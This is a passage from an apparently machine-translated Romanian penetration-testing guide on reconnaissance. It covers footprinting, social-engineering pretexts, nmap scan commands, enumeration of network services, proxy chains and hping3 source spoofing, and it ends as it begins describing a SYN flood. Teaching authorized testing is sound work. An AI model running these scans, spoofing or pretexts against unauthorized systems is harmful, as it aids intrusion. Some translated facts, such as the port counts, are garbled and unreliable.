folosim e-mailul pentru a stoca informații personale și date corporative cu atașamente. De
exemplu, dacă reușiți să obțineți contul CIO-s sau CTO-s, ar putea avea un impact semnificativ
asupra companiei. Prin urmare, securitatea e-mailului ar trebui să fie analizată atât din interior,
cât și din exterior. Capitolul 9 Introducere în amprenta Când vine vorba de testarea de
penetrare și amprenta țintei, scopul este de a determina ce informații sunt disponibile public
despre ținta dvs. Acestea sunt informații disponibile pe internet, cum ar fi arhitectura de rețea,
sisteme de operare, aplicații sau utilizatori. Acest lucru este pasiv în ceea ce privește
cercetarea. În calitate de pen-tester, trebuie să încercați orice modalitate posibilă de a căuta fie
gazde, fie rețele. Ar putea fi oricare dintre ei,
a testului de penetrare.
Dacă găsiți informații sensibile pe orice site web sau în orice locație disponibilă
public, informațiile respective trebuie raportate organizației în
raportul dvs.
Dacă găsiți informații despre care credeți că sunt esențiale și credeți că nu ar trebui
să aștepte o lună sau chiar o săptămână înainte de a trimite raportul complet, doriți să
notificați imediat persoana de contact pentru urgență.
Această etapă a atacului ar trebui să ajute la prevenirea scurgerii de informații și să
vă ajute în încercările de inginerie socială. Să ne uităm la detalii.
Primul lucru pe care îl puteți face este să obțineți autorizația corespunzătoare, iar asta va fi
de la oricine este responsabil. Poate include sau nu administratori de sistem.
De multe ori, companiile trebuie să știe cum funcționează administratorii lor de sistem.
După ce parcurgeți acest proces, trebuie să vă asigurați că definiți domeniul de aplicare.
Limitarea domeniului de aplicare a testului stilou este o condiție prealabilă. Trecerea prin
această etapă
vă ajută să configurați lista de elemente care trebuie testate. De exemplu; care sunt
intervalele IP sau intervalele de subrețea ale sistemelor sau care sunt limitările dvs.
După ce ați definit domeniul de aplicare, ar trebui să planificați și să culegeți informații despre
acesta utilizând instrumentele de recunoaștere. Trebuie să începeți cu
motoarele de căutare precum Google, Bing sau Yahoo, oricare dintre ele trebuie să utilizați
pentru a vedea
ce informații sunt expuse în prezent.
De asemenea, puteți verifica și alte site-uri specifice, cum ar fi
site-urile de rețele sociale, cum ar fi Facebook, și să vedeți dacă există o pagină Facebook sau
un cont Twitter pentru
companie.
Apoi, ar trebui să vedeți cine sunt prietenii acelei companii, deoarece acolo
veți găsi angajați existenți și veți vedea dacă puteți da înapoi de
acolo.
După ce ați terminat de căutat prin motoarele de căutare, trebuie să încercați să vedeți
dacă le puteți „pirata Google”. Puteți face acest lucru utilizând instrumente suplimentare
care vă oferă o interfață grafică cu utilizatorul, cum ar fi SiteDigger sau
baza de date Google Hacking.
Făcând hacking Google, vă va permite să găsiți resurse care au fost
accesate cu crawlere de motorul de căutare Google despre care companiile nu știu că sunt
listate acolo, cum ar fi imprimante sau camere, ceea ce vă poate oferi o perspectivă
asupra adreselor IP care sunt expuse sau ce mașină au.
Următorul tău pas după hack-ul Google este să mergi după rețelele sociale, cum ar fi
Facebook, Twitter sau LinkedIn.
Oamenii au tendința la nivelul rețelelor sociale de a-și lăsa garda
jos. Este ușor să nu vezi despre ce vorbesc oamenii, dar conversațiile la început
cu utilizatorii sau angajații ar putea fi o modalitate excelentă de a aduna
informații.
Ați putea să începeți o conversație cu un angajat existent și să spuneți: „Bună, se
pare că aveți o companie excelentă și m-am gândit să
mă alătur echipei IT. Ce tip de dispozitive folosești acolo?”
Următorul tău pas este să mergi și să urmărești site-urile web și vei face
asta fie cu BlackWidow, fie cu Web Site Copier. Cu aceste instrumente, mai întâi
trebuie să descărcați site-ul lor web, astfel încât să îl puteți privi offline și să vă uitați la
cod.
Trebuie să vă amintiți că tot ceea ce vă este prezentat într-o
interfață web sunt fișiere care sunt descărcate în sistemul dumneavoastră. Prin urmare, de ce
să nu
descărcați o copie exactă a acelui site web, astfel încât să puteți arunca o privire la ceea ce fac
ei
la back-end, mai ales dacă fac apeluri de la front-end
la back-end.
Apoi, puteți începe să vă uitați la o amprentă de e-mail. Puteți folosi câteva
instrumente grozave care vă vor face asta, cum ar fi comanda „nslookup”, pentru a afla
numele DNS și adresele IP ale serverelor lor.
Unele dintre informațiile pe care le puteți obține din e-mailuri includ
criptarea pe care o folosesc și alte servicii care ar putea fi utilizate împreună cu
mediul lor de e-mail.
De asemenea, puteți afla cum găzduiesc serverele de e-mail sau ce
furnizori de găzduire folosesc. Apoi, puteți face niște informații competitive.
Inteligența competitivă este modalitatea pe care majoritatea companiilor îl folosesc pentru a
afla
despre concurenții lor. Atacatorii pot folosi aceleași resurse pentru
a afla ce fac oamenii și este, de asemenea, o modalitate excelentă pentru
companii de a descoperi ce proiecte lucrează în prezent concurenții lor.
Apoi, ar trebui să faceți o recunoaștere „whois”, astfel încât să puteți afla cine deține
intervalul de adrese IP sau domeniul său. Pentru a realiza acest lucru, puteți utiliza instrumente
precum Domain Dossier sau SmartWhois.
Uneori, aceste instrumente vor face, de asemenea, o enumerare necesară bazată pe
DNS, care este următorul pas. Pentru recunoașterea DNS, puteți folosi instrumente
precum Sam Spade sau DNSstuff, dar întotdeauna utilizați
și comanda „nslookup”, care este foarte puternică.
Unul dintre motivele pentru care ar trebui să faceți o recunoaștere DNS este că puteți
determina gazde cheie din rețea pe care apoi le puteți utiliza pentru a
efectua atacuri de inginerie socială sau le puteți utiliza în timpul unui
atac de otrăvire DNS.
Următorul pas este să efectuați o recunoaștere a rețelei. În acest scop,
ar trebui să utilizați tipuri de instrumente, cum ar fi „Path Analyzer Pro”, care vă va arăta
calea pe care o parcurge un pachet sau instrumentul Network Pinger sau VisualRoute care
vă permite să aflați mai multe informații despre rețeaua vizată.
Acestea vă vor ajuta să desenați o diagramă mai bună a ceea ce aveți de-a face.
De asemenea, ar trebui să încercați un atac de inginerie socială care include „
surfing pe umăr” pentru a vedea dacă puteți aduna informații urmărind ceea ce
fac oamenii.
Alte atacuri de inginerie socială includ, de asemenea, scufundări în gunoi sau
interceptări. Acestea vă vor permite să culegeți informații, cum ar fi
produsele de securitate ale organizației pe care le utilizează, sistemele de operare,
versiunile de software, aspectul rețelei, adresele IP sau numele serverelor lor.
Trebuie să vă asigurați că documentați tot ceea ce găsiți. Acest lucru se datorează faptului că
va trebui să utilizați acest document și toate informațiile pe care le-ați
colectat pentru a înțelege și analiza postura de securitate a țintei dvs.
Veți fi surprins de informațiile pe care le puteți concluziona din ceea ce obțineți
folosind această metodă. Acesta este motivul pentru care este atât de important să petreci
cât mai mult
timp aici, astfel încât să poți crea o hartă cu tot ce urmează să
faci.
Capitolul 10 Descoperirea gazdei cu scanarea portului
Când vine vorba de scanarea dispozitivului țintă, trebuie să vă dați seama ce
sisteme sunt active în rețea și cât de des sunt active în rețea
.
În plus, sunt treziți doar în anumite perioade? De asemenea, va trebui să
descoperiți porturile care sunt deschise în prezent pe aceste noduri și serviciile care
rulează?
Fiecare dintre aceste lucruri vă va ajuta să determinați dacă există vreo vulnerabilitate
pe care o puteți urmări pe dispozitivul țintă. O altă modalitate de a scana
rețeaua este să descoperi dacă există bannere pe care ai putea să le apuci.
Trecând prin acest proces, veți afla ce porturi doriți să închideți,
iar dacă există bannere, le puteți ascunde sau personaliza. De asemenea, va
trebui să vedeți ce servicii nu sunt dorite și, dacă nu sunt dorite,
ar trebui să le dezactivați.
Acest lucru vă poate oferi, de asemenea, o înțelegere a modului în care puteți standardiza
firewall-ul și regulile sistemului de detectare a intruziunilor și veți vedea, de asemenea, vectorul
de configurare greșită și ce doriți să faceți pentru a remedia aceste configurări greșite.
Odată ce începeți procesul de scanare, trebuie să rulați o descoperire a gazdei,
care va detecta gazdele care sunt live în rețeaua vizată. Există
numeroase instrumente pe care le-ați putea folosi, iar unele dintre ele sunt bazate pe GUI, în
timp ce
altele sunt bazate pe linia de comandă.
De exemplu, instrumentul numit „Nmap” se uită la
mediul bazat pe DOS sau numai în linia de comandă. Nmap are, de asemenea, o versiune GUI
care se numește Zen
Map. Există și alte instrumente, dar acestea sunt cele mai populare.
Aceste instrumente nu sunt menite să fie înșelătoare; dar le poți folosi și așa
. Odată ce ați adunat o listă de noduri care sunt active în rețea,
următorul dvs. obiectiv este să faceți o scanare a portului.
Rulând o scanare de porturi, veți afla ce porturi sunt deschise. Prin aceste
porturi, un atacator poate instala malware pe un sistem sau poate profita de
anumite vulnerabilități.
Prin urmare, ar trebui să verificați întotdeauna ce porturi sunt deschise și să includeți în
raport dacă nu este necesar să fie deschise. Unele instrumente pe care le puteți folosi sunt
„nmap”, despre care am vorbit deja, dar trebuie să înțelegeți că unele
dintre aceste instrumente sunt instrumente multifuncționale.
Un alt instrument pe care îl puteți utiliza se numește „NetScanTools Pro”. S-ar putea să aveți
alte instrumente pe care le preferați, dar ar trebui să alegeți unul și să stăpâniți să îl folosiți.
Între
timp, este bine să ai expunere și la alte instrumente și nu este doar pentru
experiența ta sau pentru a-ți pune CV-ul, ci și pentru alte motive.
De exemplu, cei pe care începi să folosești aceste instrumente, îți vei da seama că fiecare
dintre
aceste programe are anumite limitări și, în timp ce unul dintre ele face o treabă, celălalt
te poate ajuta să faci o altă treabă mai bine.
Îți recomand să te concentrezi pe „Nmap” pentru viitorul tău imediat, precum și pe
lumea ta reală. Nmap este un instrument foarte la îndemână și flexibil, dar când vine vorba de
această industrie, majoritatea hackerilor etici sau profesioniștilor de testare a stiloului iubesc.
Următorul pas este prinderea bannerului. Uneori, oamenii se referă la el ca o
amprentă a sistemului de operare. Făcând o preluare de banner, puteți trimite
comenzi individuale unui sistem și acesta răspunde într-un mod specific și știm că
dispozitivele Windows reacționează într-un anumit fel, la fel ca și dispozitivele Linux.
Fiecare sistem de operare răspunde într-o abordare diferită la aceleași comenzi și
Mac-urile fac, de asemenea, același lucru. Aceste răspunsuri identifică
sistemul de operare, care vă permite să găsiți și să exploatați vulnerabilitatea, legată de acel
sistem de operare.
Instrumentele pe care le puteți utiliza pentru preluarea bannerelor includ aparate precum
„Telnet sau SSH”. Apoi, puteți începe să căutați vulnerabilități. Scanând
rețeaua pentru vulnerabilități, puteți utiliza instrumente specifice, dar este posibil să
aveți propriile preferințe, așa că permiteți-mi să vă ofer o privire de ansamblu.
Unele dintre cele mai bune instrumente pe care le puteți utiliza pentru scanarea rețelei pentru
vulnerabilități sunt „Core Impact Professional” sau „Retina”. Microsoft
face, de asemenea, unul care se numește MBSA, alias Microsoft Baseline Security Analyzer,
sau GFI LanGuard.
Scopul dvs. este de a determina slăbiciunile sau lacunele de securitate ale acelor
dispozitive țintă. Pe scurt, ați înțeles deja că este un dispozitiv Microsoft
sau un server Apache, prin urmare următoarea ta mișcare este să afli ce
vulnerabilități îi poți arunca.
Aceste instrumente vă vor ajuta să vedeți care vulnerabilități ar funcționa. Până în acest
moment, veți avea o mulțime de informații, iar acest lucru merge împreună cu
documentația, dar ar trebui să extrageți și rețeaua.
Acest lucru vă va ajuta să înțelegeți conexiunea și calea dintre nodurile
din rețea și există numeroase instrumente pe care le puteți utiliza pentru a desena
cu ușurință o diagramă de rețea.
În acest scop, unul dintre cele mai bune instrumente pe care le puteți utiliza se numește
„SolarWinds” și
„Network Topology Manager”. Unele dintre aceste instrumente sunt gratuite, în timp ce unele
dintre
ele sunt produse plătite.
Majoritatea companiilor folosesc „SolarWinds”, pe care îl puteți folosi în diverse
scopuri. Cu SolarWinds, puteți desena hărți de rețea, puteți trimite
comenzi către mai multe dispozitive în timp real sau, dacă preferați sau doriți,
puteți programa data și ora implementării comenzilor.
Puteți utiliza SolarWinds în scopuri de gestionare a IP, precum și pentru alerte privind
întreruperile rețelei sau întreruperile interfeței și așa mai departe. SolarWinds are un
cost, dar este un software grozav și companiile îl folosesc în numeroase scopuri.
Scopul tău este să obții o reprezentare vizuală pentru a înțelege mai bine ce este
unde și cum sunt conectate. Odată ce cunoașteți țintele pentru că le-
ați identificat pe deplin și vulnerabilitățile lor și ați elaborat
topologia rețelei, următorul pas în timpul testării pen-ului este să vă activați
proxy-urile.
Proxy-ul este conceput pentru a ascunde serverele, astfel încât clientul sau clientul să nu poată
determina de unde vine atacul. Puteți activa ambele proxy;
intern si extern.
Unul dintre cele mai bune instrumente pe care le puteți utiliza pentru proxy se numește „Proxy
Workbench”. Proxy Workbench are o interfață GUI care utilizează
rețeaua TOR. Un alt produs pentru Mac OS se numește „proxifier”.
Odată ce începeți să rulați proxy-ul dorit, veți primi o listă de
adrese IP și puteți selecta câte trebuie să utilizați. Unele dintre aceste proxy-uri
sunt servicii gratuite, iar dacă căutați pe Google „proxy-uri gratuite”, puteți crea un
lanț de proxy în cel mai scurt timp. Indiferent de proxy pe care îl vei folosi, ar trebui să
documentezi
și asta.
Documentarea este cel mai important pas în testarea stiloului, deoarece vă ajută
să păstrați toate rezultatele testelor pe care le-ați efectuat. De asemenea, vă va
ajuta să găsiți potențiale vulnerabilități în rețea, astfel încât să puteți
recomanda câteva contramăsuri.
În același timp, vrei să arăți clientului tău cum ai reușit să
realizezi ceea ce ai făcut. Acesta este și cel mai bun mod de a legitima ceea ce ați
făcut și ce le-ar putea face un atacator.
Odată ce v-ați găsit țintele, următorul pas este enumerarea. Folosind
enumerarea, atacatorul poate aduna cât mai multe informații despre
dispozitivul țintă.
Unii raportează că se poate retrage din aceste sisteme ar trebui să includă
grupuri de identitate, conturi de utilizator și conturi de serviciu, deoarece nimeni nu se uită la
acele
lucruri.
De asemenea, puteți determina resursele de rețea și partajările de rețea sau alte
descoperiri care sunt partajate de pe acel aparat. În multe cazuri, puteți
enumera și aplicațiile care sunt instalate pe acele dispozitive.
Pasul de enumerare se bazează pe datele pe care le colectați din
etapa de recunoaștere, dar ar trebui să vă uitați și la enumerarea
dispozitivelor de rețea.
Dispozitivele de rețea includ; routere, comutatoare, sisteme de detectare a intruziunilor,
sisteme de prevenire a intruziunilor, firewall-uri, motoare pentru servicii de identitate,
controlere LAN fără fir și așa mai departe.
În calitate de tester, ar trebui să faceți numeroase tipuri diferite de
metode de enumerare pentru a vă asigura că obțineți toate informațiile pe care le puteți de la
fiecare
mașină vizibilă în rețeaua vizată.
Motivul pentru care ar trebui să faceți acest lucru este să determinați punctele slabe și
vulnerabilitățile rețelei organizației. Scopul principal este de a încerca să
identifice lacunele infrastructurii de rețea.
Puteți începe pașii de enumerare prin găsirea domeniului de rețea a
companiei sau a țintelor și puteți face asta cu o comandă „whois” pentru a
căuta dispozitive, astfel încât să puteți vedea ce intervale au fost atribuite în
partea publică.
Aici găsești cele mai importante servere, deoarece este de obicei fața
companiei și care oferă un serviciu, în care oamenii se conectează
sau obțin informații despre companie.
Odată ce aveți acel interval de IP, doriți să calculați masca de subrețea, care
vă poate ajuta să restrângeți intervalele de ping. Acest lucru vă va ajuta și la
scanarea portului.
Odată ce ați calculat masca de subrețea, următorul pas este să descoperiți gazdele
care sunt disponibile public de pe internet. Încă o dată, prima
recomandare este să folosiți software precum „nmap”.
S-ar putea să mergeți mai departe și să utilizați alt software, dar acestea ar putea fi mai
detectabile. De exemplu, „Angry IP scanner” este extrem de ușor de detectat, dar
cu „nmap”, veți fi bine, mai ales dacă mapați
doar o dată pe minut, așa că nu va arăta ca un ping.
Odată ce ai descoperit gazdele, trebuie să mergi după porturi. Doriți să
puteți vedea ce porturi sunt deschise, care sunt închise și care porturi
permit doar traficul specific.
Acest lucru vă oferă un aspect mai bun al politicii de securitate pe acele mașini. Unul
dintre cele mai populare instrumente pe care le puteți folosi în acest scop este: (ați ghicit
bine) „nmap”.
Odată ce ați efectuat scanarea portului, aveți câteva alte
metode de enumerare pe care le puteți utiliza pentru a vă oferi o imagine mai bună. Una dintre
acestea se numește
„enumerare NetBIOS”.
Când efectuați o enumerare NetBIOS, o utilizați pentru a identifica
dispozitivele de rețea și pentru a obține o listă de computere care pot fi pe domeniu. De
asemenea , este
posibil să vedeți o listă de foldere partajate, dar, în unele cazuri, chiar și parole.
Pentru enumerarea NetBIOS, puteți utiliza și „WinFingerprint” sau
„SuperScan”. Dacă faceți enumerarea NetBIOS, nu numai fiecare mașină va
răspunde la aceste tipuri de enumerare, dar ar trebui să încercați și să
vă construiți harta.
Prin implementarea diferitelor metode de enumerare, puteți completa spațiile
libere cu o „enumerare SNMP”. SNMP sau Simple Network
Management Protocol este un protocol pe care îl puteți utiliza pentru a vă gestiona
dispozitivele din rețea.
Dacă SNMP este configurat incorect, puteți avea acele dispozitive de rețea
să vă identifice și să vă ofere informații utile, cum ar fi
conturile de utilizator, versiunile IOS pe care le rulează, timpul de funcționare și adresele IP
cărora le
sunt alocate.
Unul dintre cele mai bune instrumente pe care le puteți utiliza pentru enumerarea SNMP
include
SolarWinds și „Setul de instrumente de monitorizare a rețelei OpUtils”. Deoarece SNMP nu este
întotdeauna utilizat pe mașinile de rețea, cum ar fi routerele și comutatoarele, puteți instala
SNMP pe servere pentru a gestiona acele dispozitive sau pentru a fi notificat când
se întâmplă ceva.
Dacă încă nu ți-ai desenat harta, trebuie să o faci cu o
enumerare LDAP. LDAP face parte din Active Directory, dar există
și alte produse care acceptă mediul LDAP.
LDAP este o bază de date în care sunt stocate informații despre utilizator, cum ar fi numele,
prenumele, informațiile personale, ora și datele la care se pot conecta,
de unde se pot conecta, departamentele în care lucrează și așadar. pe.
Enumerarea LDAP este grozavă, deoarece puteți face alte lucruri pe baza
informațiilor pe care le puteți descoperi, inclusiv atacuri de inginerie socială. Cel mai bun
instrument pe care îl puteți folosi aici se numește „LDAP Administrator Softterra”.
Odată ce ați făcut enumerarea LDAP, o altă metodă pe care o puteți
utiliza se numește „enumerare NTP”. Testarea de penetrare externă testează
securitatea, înconjurând sistemele conectate extern de pe internet.
Testele controlate sunt folosite pentru a obține acces la resursele de internet și, în cele din
urmă, la
„DMZ”, care este o rețea internă prin trecerea prin și în jurul
firewall-urilor de pe internet.
Testarea de penetrare externă implică, de asemenea, găsirea și exploatarea
vulnerabilităților reale cunoscute și necunoscute din perspectiva unui
atacator extern.
Cum veți executa sarcina de testare a stiloului extern? Ei bine, odată ce ați
cerut clientului informații despre infrastructura sa, trebuie să desenați
o diagramă vizuală care să reprezinte infrastructura organizației clientului.
Desenele ar trebui să includă ambele; părțile fizice și persoanele asociate
cu acel articol, dacă este posibil. Harta rețelei dvs. ar trebui să includă și intervale de IP
pe care clientul vi le-a dat deja.
Opțional, furnizorul de servicii de internet sau ISP-ul ar putea fi adăugat pentru mai multă
claritate. Folosind Kali Linux, primul lucru pe care îl veți face este să mapați ruta către
țintă.
Apoi, veți rula un ping sweep împotriva rețelei țintă. Sau, mai bine,
veți cere rețelei dvs. țintă să caute orice gazde live și, încă o dată,
veți folosi „nmap” pentru a efectua
tehnici de scanare a mai multor porturi împotriva țintei dvs.
„Cartarea rutei” a fost folosită inițial ca instrument de diagnosticare care vă permite să
vizualizați ruta pe care o urmează un pachet IP de la o gazdă la alta. Folosind
câmpul „TTL” sau „Time to Live” dintr-un pachet, fiecare salt de la un punct la altul
provoacă un mesaj „ICMP” de depășire a timpului. ICMP înseamnă Internet
Control Message Protocol.
Pachetele numără numărul de gazde și ruta parcursă. De exemplu
, gazda sursă este Kali Linux, iar serverul de pe Google este conectat
prin două routere intermediare, pe care le voi numi „R1” și „R2”.
În primul rând, nodul Kali va trimite o sondă TTL 1 către routerul R1. Apoi R1
îl va ridica și trimite un răspuns înapoi cu timpul depășit.
Apoi, gazda lui Kali va trimite o sondă TTL 2 la R1, unde R1 o preia și
o micșorează cu una, apoi o va trimite la R2. R2 îl va ridica și
va trimite înapoi un pachet cu timpul depășit.
În cele din urmă, nodul Kali va trimite o sondă TTL 3 către R1. R1 îl va ridica,
îl va micșora cu unul și apoi îl va trimite la R2. După aceea, R2 îl va ridica,
îl va micșora cu unul și îl va trimite pe serverul Google.
Când serverul Google îl preia, trimite un răspuns înapoi cu
portul de destinație inaccesibil. De ce? Pentru că de cele mai multe ori, serverele blochează
pachetele
pentru acest tip de port.
În Kali Linux, „traceroute” este un program de linie de comandă care utilizează
pachete ICMP pentru a mapa traseul. Pentru a urmări traseul către serverul Google, tastați
„traceroute www.google.com”
și ar trebui să vedeți că a fost nevoie de între 12 și 16 hop pentru a ajunge la
serverul Google. Dacă încercați din nou, dar de data aceasta îl executați folosind „nmap”, veți
obține un rezultat puțin diferit. De ce?
Ei bine, „nmap” vă permite să faceți exact același lucru, dar utilizează
în schimb protocolul TCP, care este permis de aproape fiecare firewall.
Pentru a vă face o idee despre câteva exemple de scanare Nmap de bază folosite adesea în
prima etapă a enumerarii, consultați următoarele comenzi:
„nmap -sP 10.0.0.0/24“
Ping scanează rețeaua, listând mașinile care răspund la ping.
„nmap -p 1-65535 -sV -sS -T4 target“
Scanare completă a portului TCP folosind detectarea versiunii de serviciu - de obicei prima
mea
scanare, găsesc T4 mai precis decât T5 și încă „foarte rapid”.
„nmap -v -sS -A -T4 target“
Imprimă rezultate detaliate, rulează stealth syn scan, T4 timing, OS și
detectarea versiunilor și oferă traceroute și scripturi împotriva serviciilor țintă.
„nmap -v -sS -A -T5 target“
Imprimă rezultate detaliate, rulează stealth syn scan, T5 timing, OS și
detectarea versiunilor și oferă traceroute și scripturi împotriva serviciilor țintă.
„nmap -v -sV -O -sS -T5 target“
Imprimă o ieșire detaliată, rulează stealth syn scan, sincronizare T5 și oferă
detectarea sistemului de operare și a versiunii.
„nmap -v -p 1-65535 -sV -O -sS -T4 target“
Imprimă o ieșire detaliată, rulează scanarea stealth syn, sincronizarea T4,
detectarea sistemului de operare și a versiunii și oferă scanare completă a intervalului de
porturi.
„nmap -v -p 1-65535 -sV -O -sS -T5 target“
Imprimă o ieșire detaliată, rulează scanarea stealth syn, sincronizarea T5,
detectarea sistemului de operare și a versiunii și oferă scanare completă a intervalului de
porturi.
De fiecare dată când vedeți trei puncte în ieșirea liniei de comandă, înseamnă
că pachetele sunt blocate. Motivul pentru aceasta ar putea fi un firewall, cum ar fi
Checkpoint sau Cisco ASA Firewall, care elimină aceste tipuri de
pachete în mod implicit.
Scanarea portului cu „nmap” este procesul de conectare la
porturile TCP și UDP pentru a determina ce servicii și aplicații rulează pe
sistemul țintă.
Există 65, 535 de porturi, fiecare pentru TCP și UDP pe fiecare
computer. Se știe că unele porturi sunt asociate cu anumite servicii, de
exemplu portul TCP 21 este cunoscut pentru serviciul FTP.
Primele 124.000 de porturi sunt cunoscute și sub denumirea de „porturi binecunoscute” și
sunt
folosite de cele mai definite servicii. Ori de câte ori vorbești despre scanarea portului,
„nmap” ar trebui să-ți vină în minte.
Nmap este un instrument universal de mapare a portului, iar maparea se bazează pe
amprentarea activă a stivei. Pachetele special concepute sunt trimise către sistemul țintă
, iar răspunsul sistemului de operare la acele pachete permite o hartă pentru a
identifica sistemul de operare.
Pentru ca „nmap” să funcționeze, cel puțin un port de ascultare trebuie să fie deschis, iar
sistemul de operare trebuie să fie cunoscut și amprentat. Am putea petrece
toată cartea vorbind despre „nmap”, iar dacă nu ați mai folosit-o până acum, vă
recomand să o verificați.
Există și alte resurse pentru descoperirea de bază a gazdei în ceea ce privește
solicitările de eco ICMP și răspunsurile la eco, precum și întrebările legate de DNS și modul în
care
sunt rezolvate numele de gazdă.
Când vine vorba de firewall-uri, există tipuri „stateful” și „stateless”. Ei bine,
există și firewall-uri bazate pe zone, firewall-uri bazate pe politici și multe altele,
dar în rezumat; firewall-urile stateful permit traficul de intrare dacă acesta a fost
inițiat din rețeaua internă provenind dintr-o rețea exterioară.
Pe de altă parte, firewall-urile fără stat sunt firewall-uri care aruncă pachetele de intrare
chiar dacă traficul a fost inițiat din interior; cu excepția cazului în care există o
regulă de „acceptare” pentru firewall care a fost implementată anterior, care permite traficul de
la o anumită
sursă către o anumită destinație pe un anumit număr de port.
Nmap folosește funcționalitatea „traceroute” pentru a identifica drumul către serverul pe care
l-ați
ales ca destinație. Odată ce ați identificat câteva adrese IP
cu nmap, puteți utiliza, de asemenea, comanda „traceroute” pentru a determina ce
hop-uri sunt pe drum între dvs. și dispozitivele finale pe care le-ați
identificat.
Odată ce „traceroute” este finalizat, primul pas este să rulați un ping de rețea
pe un spațiu de adresă IP țintă și să căutați răspunsuri care indică faptul că o
anumită țintă este în viață. În mod tradițional, ping se referea la utilizarea
pachetelor „ICMP”.
Cu toate acestea, traficul TCP, UDP, ICMP și ARP poate fi folosit și pentru a identifica
gazdele live. Există diverse scanere care pot fi utilizate pentru a rula din locații îndepărtate
de pe internet pentru a identifica gazdele live.
În timp ce instrumentul de scanare principal este „nmap”, Kali oferă câteva alte
aplicații care sunt utile, cum ar fi „hping3”.
„Hping3” este unul dintre cele mai utile instrumente datorită controlului pe care îl oferă asupra
tipurilor de pachete, pachetului sursă și pachetului destinație. De exemplu, dacă doriți
să faceți ping la serverul Google, ei bine, dacă Google nu permite
solicitări ping ICMP, atunci ar putea fi posibil să faceți ping la serverul Google folosind
cererea de trimitere TCP.
De exemplu, puteți trimite ping la google.com din linia de comandă, folosind comanda
ping cu argumentul „-c”, care va seta un număr de trimiteri a
trei pachete către serverul google.
Dacă vedeți o pierdere de pachete de 100%, înseamnă că Google blochează
comenzile ping bazate pe pachete ICMP. Acest lucru nu ar trebui să vă oprească deloc,
deoarece aveți cele
mai puternice instrumente instalate pe Kali, care este „hping3”.
Comanda pe care trebuie să o utilizați este aceeași, dar în loc să tastați ping,
tastați doar „hping3”
urmat de adresa de destinație.
Puteți crea mai multe variante ale instrumentului „hping3” care vor
descoperi și gazdele live și întreaga hartă folosind răspunsurile ICMP și
pachetele trimise TCP pe porturile 80 și 443 în același timp.
Puteți folosi argumente împreună cu comanda, cum ar fi „–t” care stă
pentru cronometrare, urmată de un număr între 1 și 5, unde 1 este cel mai lent
și 5 este cel mai rapid.
Apoi indicatorul „-sn” este folosit pentru descoperirea gazdei, urmat de opțiunea „-v”,
care este folosită pentru perfect verbose. În scurt timp, vom analiza un
exemplu specific de utilizare a hping3, dar înainte de asta, să rezumăm NTP SMTP și
DNS.
NTP înseamnă Network Time Protocol, care este ceasul sau
protocolul de sincronizare a orei. Din păcate, NTP vă permite uneori să interogați
serverele care acționează ca sincronizare de timp pentru a obține mai multe informații,
cum ar fi o listă de colegi și alte statistici care sunt deseori pe care oamenii le solicită.
Există un software numit „NTP Fingerprint Utility”, care vă permite să
identificați sistemul de operare pe care rulează serverul NTP. Apoi,
ar trebui să încercați să testați Enumerarea SMTP.
SMTP înseamnă Simple Mail Transfer Protocol, care este folosit pentru e-mailuri și
servere de e-mail. Puteți utiliza un script Perl numit „enumerare SMTP” și
numeroase comutatoare cu nmap pentru a expune adresele de e-mail legitime, care
ar putea include numele de utilizator ale utilizatorilor finali.
Software-ul numit „Metasploit” vă poate ajuta, de asemenea, să enumerați e-mailurile
utilizatorului
folosind protocolul SMTP. După ce ați testat enumerarea SMTP
și enumerarea LDAP, există și serviciul numit DNS.
DNS este serviciile dvs. de denumire a domeniilor, care este un serviciu care ține evidența
numelor de domenii la adresele lor IP. Există multe instrumente pe care le puteți
utiliza pentru enumerarea DNS, inclusiv „BioSuite”, „Nmap” sau „TX DNS
Lookup”. De asemenea, asigurați-vă că vă amintiți comanda „nslookup”.
Acum că aveți o mulțime de informații pe care le-ați adunat, trebuie să
vă actualizați documentația. De fapt, documentația dvs. trebuie reîmprospătată
aproape la fiecare pas pe parcurs.
De asemenea, trebuie să vă folosiți documentația pe măsură ce o construiți, astfel încât să
puteți
analiza rezultatele și să sugerați clientului câteva contramăsuri pentru a-și
îmbunătăți securitatea. Nu uitați că scopul este să vă asigurați că protejați
clientul și oferiți feedback.
Vă rugăm să rețineți că restul acestei cărți se va concentra pe exemple concrete
despre cum pot fi implementate atacurile.
Capitolul 11 ​Descoperirea dispozitivelor cu Hping3
Pentru a descoperi dispozitivele de rețea, indiferent care sunt locale sau la distanță, și acestea
nu răspund direct la cererea ping ICMP, putem verifica în continuare dacă
există utilizând opțiunile TCP și UDP. Hping3 are toate aceste opțiuni și multe
altele.
Dacă nu aveți niciun răspuns de la un dispozitiv despre care sunteți sigur că există, este
posibil ca firewall-ul să fi fost configurat să nu permită solicitări ping pentru
a elimina atacurile de refuzare a serviciului și acest lucru este de înțeles, dar
doriți totuși să verificați acel dispozitiv. .
Organizațiile mari dezactivează răspunsurile ping, filtrăndu-le pe firewall-urile lor.
Totuși, dacă vrem totuși să validăm că dispozitivul pe care încercăm să-l trimitem ping este în
funcțiune, putem
folosi multe alte instrumente despre care am discutat deja, cum ar fi nmap și
ZenMAP.
Hping3 a înlocuit versiunea anterioară cunoscută sub numele de ping2 și acum are
funcții suplimentare pe lângă ping ICMP, cum ar fi:
➢ Solicitare ping cu TCP,
➢ Solicitare ping cu UDP,
➢ Amprentare,
➢ Instrument Sniffer și spoofer,
➢ Scanare avansată de porturi,
➢ Testare firewall ,
➢ Măsurarea de la distanță a timpului de funcționare,
➢ TCP/IP alias auditarea stivei modelului OSI,
➢ Instrument Advance Flooding,
➢ Covert Channel Creations,
➢ Scopuri de transfer de fișiere și multe altele.
Hping3 este un instrument excelent de descoperire a dispozitivelor și este încorporat implicit
în Kali Linux
. Hping3 operează pe o interfață de linie de comandă și are multe
funcționalități. Pentru a lista aceste funcționalități, tastați:
„hping3 – h”
și apăsați Enter. Aici, h înseamnă ajutor, prin urmare, vi se va oferi
ieșirea posibilităților folosind hping3.
Folosind Hping3, puteți specifica ping nu numai o adresă, ci sute de
adrese în același timp și vă puteți manipula propria
adresă IP sursă pentru a arăta ca orice altă adresă IP cu care doriți să arate.
În plus, puteți manipula interfața sursă de unde
provine ping-ul. Prin urmare, este aproape imposibil să o urmărim până la
sursa reală.
Nu voi intra în toate posibilitățile pe care le puteți face cu Hping3, dar voi
menționa că este foarte ușor să creați un atac Denial of Service.
Pentru a stabili o conexiune între două dispozitive de rețea, ar trebui să existe o
strângere de mână TCP în trei căi și primul pas trebuie să fie o solicitare SYN. SYN înseamnă
Sincronizare.
Ceea ce putem iniția este o solicitare SYN continuă către un dispozitiv care ar fi
